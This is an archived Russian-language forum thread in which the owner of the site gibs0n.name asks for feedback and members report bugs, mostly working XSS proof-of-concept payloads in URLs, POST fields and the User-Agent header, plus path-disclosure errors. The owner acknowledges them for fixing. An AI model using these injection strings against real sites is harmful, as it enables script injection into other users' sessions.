Просмотр полной версии : gibs0n.name
Доброго времени суток! Дописываю свою хоум пагу, мб есть какие то баги/пожелания/предложения по содержимому и по дизу прошу написать. Просто легче исправлять что то когда знаешь что именно нужно исправлять.
Авторам утилит которые выложенны на сайте, просьба отписаться если они не хотели бы их там видеть. Заранее спс.
в утилите en\de(code) string проходят скрипты.
в ие все намного хуже, чем предыдущий скрин)
http://gibs0n.name/tools/mail.php?dxparam="><script>alert()</script>
XSS
POST / host='"/><script>alert(/1/)</script>
POST /tools/dxval='"/><script>alert(/1/)</script>
При добавлении коментария можно обойти js на инкорект нейм что является уязвимым...
Короче почти во всех тулзах XSS
дефейс кнопки)
http://gibs0n.name/tools/mail.php?dxparam=hacked
Автоддос с помощью тулзы pinch flooder =)
xss для IE (в опере урлэнкодятся эти символы)
http://gibs0n.name/index.php/";alert(99);"
flintstone
22.02.2008, 01:21
Раскрытие содержания кода если выделить шапку в http://gibs0n.name/?do=sniff&order='"/><script>alert(/1/)</script>
XSS если ввести в Host information: <script>alert("1")</script>
При добавлении коментария можно обойти js на инкорект нейм что является уязвимым...
2 Isis каким образом?
во сновном ксс в тузлах сторонних разработчиков, буду исправлять=\
мб кто что скажет как можно диз по лучше сделать?
imajo.ati
07.03.2008, 01:25
http://gibs0n.name/?do=";alert()//
IE не кодирует кавычку и получается xss
а, не увидел, нашли уже =) но там не в параметрах дело - запрос напрямую вставляется в скрипт
Заапаем тему =)
Переписал сайт на симфони, еще не все дописано, но пока что есть
http://gibs0n.name
зы За конструктивные предложения с меня +
зыы Кто хочет обменяться ссылками в личку или аську.
BlackSun
23.03.2009, 02:19
XSS, раскрытие путей
http://gibs0n.name/poll_results/9999999')<img src=. onerror=alert()>
Раскрытие путей можно найти в сорце, не вдавался в подробности, почему в браузере этот блок не показывается
оО, скули и ксс там сразу отпадают, мб только если находиться в разработке как сейчас.
BlackSun: но на данный момент присутствует XSS :)
http://fun.gibs0n.name/index.php/mainpage/category/id/'2
251. {
252. if (!$condition)
253. {
254. throw new sfError404Exception($this->get404Message($message));
255. }
256. }
257. public function forward404If($condition, $message = null)
xss:
http://fun.gibs0n.name/index.php/mainpage/category/id/'2<script>alert(/SiXss/);</script>
смотрим линк картинки:
http://fun.gibs0n.name/index.php/mainpage/view?id=2
[i]http://fun.gibs0n.name/img/2009/03/3c3a7891a6cabfd38c26673a7c712ec4.jpg[i]
смотрим в папку:
http://fun.gibs0n.name/img/2009/03/ ошибка
706. {
707. $this->dispatcher->notify(new sfEvent($this, 'application.log', array(sprintf('Action "%s/%s" does not exist', $moduleName, $actionName))));
708. }
709. throw new sfError404Exception(sprintf('Action "%s/%s" does not exist.', $moduleName, $actionName));
710. }
711. $actionInstance = $this->getAction($moduleName, $actionName);
712. $this->getActionStack()->addEntry($moduleName, $actionName, $actionInstance);
XSS
http://fun.gibs0n.name/img/2009/03/
в User-Agent: <script>alert(/xss/);</script>
perhaps Overfload:
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222
xss:
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222<script>alert(/x/);</script>
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222
User-Agent: <script>alert(/xss/);</script>
Прикрутил поиск с помощью Sphinx. Знаю, что это немного глупо, но вещь действительно мощная и очень гибка. Поиск осуществлять одно удовольствие. Если кто знает как осуществлять переиндексацию, просьба отписаться в ПМ.
http://gibs0n.name/search
Появился новый поддомен http://fun.gibs0n.name - пока в стадии разработки. Пока не знаю что там и как сделать, если у кого есть предложения, отписываемся в ПМ, постараюсь реализовать.
предложения/пожелания в ПМ
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot